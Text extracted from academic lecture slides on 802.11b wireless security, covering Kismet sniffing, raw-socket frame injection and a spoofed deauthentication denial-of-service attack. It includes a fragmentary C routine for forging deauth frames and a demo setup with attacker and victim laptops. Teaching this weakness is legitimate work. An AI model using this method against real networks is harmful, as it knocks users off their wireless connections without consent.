802'11 Attack Demo

1
802.11 Attack Demo

• Haobo Zhou
• (hzhou_at_liacs.nl)
• L I A C S
• http//www.liacs.nl/home/hzhou

2
What Will Be Covered

• Overview of 802.11b
• Wireless network sniffer
• Frame Injection
• Deauth/Disassociation Attack
• Attack Demo

3
NO!! Thanks
OK !!
Dinner??
4
ISO OSI Model and 802.11b
Overview of 802.11b
Obtained From http//alpha.fdu.edu/kanoksri/IEEE8
0211b.html
5
Overview of 802.11b

• Runs over 2.4ghz
• DSSS - Direct Sequence Spread Spectrum
• Channels
• FCC (US) - 11 Channels (1-11)
• ETSI (EU) - 13 Channels (1-13)
• France - 4 Channels (10-13)
• Japan - 14 Channels (1-14)
• Uses CSMA/CA

6
Overview of 802.11b

• Uses WEP for Encryption
• Wired Equivalent Privacy
• Uses RC4
• 40-bit or 104-bit static key with 24-bit IV

7
Overview of 802.11b

• Consists of 3 main protocol types
• Management
• Control
• Data

8
Overview of 802.11b
AD Hoc
9
Overview of 802.11b
Infrastructure
10
Overview of 802.11b
Node
Access Point
Access Point Accepts Node
Node is Associated
11
Wireless network sniffer

• wireless networking Detection
• NIC with monitor mode support
• why?
• Management frame
• Frames belongs to others
• Tools
• Kismet
• others

12
Wireless network sniffer

• Networking Interface Card Mode
• Managed (Infrastructure)
• Ad-Hoc (AD Hoc )
• Monitor ( Hardware support ??)
• Master (acts as an AP)

13
Wireless network sniffer

• KISMET
• An 802.11 layer2 wireless network sniffer
• Working on Linux
• Ethereal/Tcpdump compatable data logging
• Over 20 supported card types
• Open source code

14
Kismet
15
Frame Injection

• NIC
• support ?
• Device Driver
• support frame injection?
• Yes- very good
• NO- Change it!
• User program

16
Frame Injection

• User program
• C code in linux
• RAW socket programming
• Use PF_PACKET interface to access the link layer
• sdsocket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))

17
Deauthentication Attack

• Management frames can control link
  characteristics and physical medium properties
• 802.11b management frames are NOT authenticated
• Why is this bad?

18
Deauthentication Attack

• Denial of Service De-authentication
• Use MAC address of Access Point
• Send deauthenticate frames
• Send continuously
• Users are unable to reassociate with AP

19
Deauthentication Attack
STATE 1 Unauthenticated Unassociated
STATE 2 Authenticated Unassociated
Successful authentication
Deauthentication
Disassociation
Deauthentication
Successful Association
STATE 3 Authenticated Associated
20
Deauthentication Attack
Deauth frame structure
21
Deauthentication Attack

• void send_deauth (__u8 dst, __u8 bssid)
• struct
• struct a3_80211 hdr
• __u16 reason
• mgt_frame
• memset(mgt_frame, 0, sizeof(frame))
• mgt_frame.hdr.mh_type FC_TYPE_MGT
• mgt_frame.hdr.mh_subtype MGT_DEAUTH
• memcpy((mgt_frame.hdr.mh_mac1), dst, 6)
• memcpy((mgt_frame.hdr.mh_mac2), bssid, 6)
• memcpy((mgt_frame.hdr.mh_mac3), bssid, 6)
• mgt_frame.reason 2
• send(socket, frame, sizeof(mgt_frame), 0)

22
Question ? deauth-attack demo continues
23
802.11 Deauth-attack DEMO

• Hardware
• Laptop
• Wireless card
• Atheros 5212 chip
• monitor mode support
• software
• Device Driver
• Madwifi
• open source project
• Two patches to enable frame injection
• User program
• Fata_jace.c

• Hardware
• Laptop
• Wireless card
• Software
• Ping
• Use ping to make sure the connection

Attacker
Victim
24

• Thanks
• Xu Li
• Wei Wang
• Google